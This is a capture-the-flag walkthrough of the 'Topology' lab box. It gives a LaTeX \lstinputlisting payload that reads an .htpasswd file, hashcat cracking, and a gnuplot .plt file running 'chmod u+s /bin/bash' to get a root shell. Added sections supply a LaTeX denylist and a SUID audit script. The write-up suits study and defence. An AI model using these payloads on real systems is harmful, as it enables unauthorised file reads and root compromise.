Topology
Majd Abuleil


nmap -sC -sV [IP]


We have two open ports >>> 22 SSH — 80 HTTP
Go to the site: [IP]:80


We have another website, starting with LaTeX; this looks like a site that renders equations into images.


I searched Google for "latex exploit".


After searching and trying a few things, I found that the final payload is:
$\lstinputlisting{/var/www/dev/.htpasswd}$
After I put that in, I got this:
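The root cause on the web side is that user-supplied LaTeX reaches the renderer with file-reading primitives intact. As an added example (not code from the original writeup or from the target site), here is the kind of input check the equation service should have run before compiling: it rejects any control word from a constructed denylist of file/shell primitives, and also rejects the ^^ hex notation that can smuggle a backslash past a regex. The denylist contents and the length limit are my assumptions.

```python
import re

# Constructed denylist: LaTeX primitives that read files, write files or run
# commands. \lstinputlisting is the one used against this box; the others are
# the usual companions a reviewer would block for the same reason.
# Assumption: the renderer's LaTeX build is not otherwise sandboxed.
DANGEROUS_PRIMITIVES = frozenset({
    "input", "include", "lstinputlisting", "InputIfFileExists",
    "openin", "openout", "read", "write", "write18", "immediate",
    "catcode", "def", "csname", "usepackage", "verbatiminput",
})

# A control word is a backslash followed by letters only, so "\inputfoo" is
# the single control word "inputfoo" and does not match "input".
_CONTROL_WORD = re.compile(r"\\([A-Za-z]+)")


def find_dangerous_commands(tex: str) -> list[str]:
    """Return every control word in `tex` that is on the denylist."""
    return [name for name in _CONTROL_WORD.findall(tex)
            if name in DANGEROUS_PRIMITIVES]


def is_safe_equation(tex: str, max_len: int = 500) -> bool:
    """Accept only short input with no file/shell primitives.

    The ^^ notation (e.g. ^^5c for a backslash) lets an attacker build a
    control sequence the regex never sees, so it is rejected outright.
    """
    if len(tex) > max_len:
        return False
    if "^^" in tex:
        return False
    return not find_dangerous_commands(tex)


if __name__ == "__main__":
    # Constructed sample inputs: a normal equation and the payload from above.
    for sample in (r"\frac{a}{b} + \sqrt{x}",
                   r"\lstinputlisting{/var/www/dev/.htpasswd}"):
        print(repr(sample), "->", "accepted" if is_safe_equation(sample) else "rejected")
```

A denylist like this is a stopgap; the stronger fix is to compile in a sandbox with the TeX Live settings `openin_any = p`, `openout_any = p` and `shell_escape = f` in texmf.cnf, so the engine itself refuses to open files outside the working directory.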


I used hashcat to recover the plaintext for this hash:
hashcat -m 1600 -a 0 [hashFile] [Wordlist]
Now that I have the password and the username, I can connect over SSH:
ssh vdaisley@[IP]


USER FLAG →


ROOT FLAG →


I used a tool called pspy64.
1- I found this: /opt/gnuplot. I searched for a gnuplot exploit and found that I can create files ending with .plt and put a command inside.
2- So I create a file inside /opt/gnuplot like this: touch /opt/gnuplot/watch.plt [you can choose any name for the file 😊]
3- Then I write this inside watch.plt:
system "chmod u+s /bin/bash"
Now I run /usr/bin/bash -p
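The privilege escalation works because a directory a low-privileged user can write to (/opt/gnuplot) is consumed by a job that executes its .plt files as root (implied by the writeup, since the SUID bit ends up set). As an added example, not code from the original post, here is a small audit a defender can run to catch both halves of that pattern: a spool directory that is group- or world-writable, and a shell binary that has acquired the SUID bit. The directory path and the list of shells are my assumptions; the helpers take raw mode words so they can be checked without touching the filesystem.

```python
import os
import stat


def writable_by_others(mode: int) -> bool:
    """True if the group or world write bit is set on a st_mode word."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def is_setuid_root(mode: int, uid: int) -> bool:
    """True if the file is owned by root and carries the SUID bit."""
    return uid == 0 and bool(mode & stat.S_ISUID)


def audit_spool_dir(path: str) -> list[str]:
    """Flag a root-consumed spool directory that unprivileged users can write to.

    Assumption: everything placed here is executed by a root job, so the
    directory itself, and every file in it, should be writable only by root.
    """
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return findings
    if st.st_uid != 0 or writable_by_others(st.st_mode):
        findings.append(f"{path}: spool dir is writable by non-root (mode {oct(st.st_mode)})")
    for name in os.listdir(path):
        full = os.path.join(path, name)
        fst = os.lstat(full)
        if fst.st_uid != 0 or writable_by_others(fst.st_mode):
            findings.append(f"{full}: job input writable by non-root (uid {fst.st_uid})")
    return findings


def audit_setuid_shells(shells=("/bin/bash", "/usr/bin/bash", "/bin/sh", "/bin/dash")) -> list[str]:
    """Flag any shell that has been given the SUID bit; none should have it."""
    findings = []
    for shell in shells:
        try:
            st = os.stat(shell)
        except FileNotFoundError:
            continue
        if is_setuid_root(st.st_mode, st.st_uid):
            findings.append(f"{shell}: SUID root shell present (mode {oct(st.st_mode)})")
    return findings


if __name__ == "__main__":
    # Directory path taken from the writeup; adjust for other hosts.
    for finding in audit_spool_dir("/opt/gnuplot") + audit_setuid_shells():
        print("FINDING:", finding)
```

The same two checks map directly to the fix: make the spool directory root-owned with mode 0755 (or move it out of any user-writable tree), and alert on any SUID shell, since there is never a legitimate reason for one.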

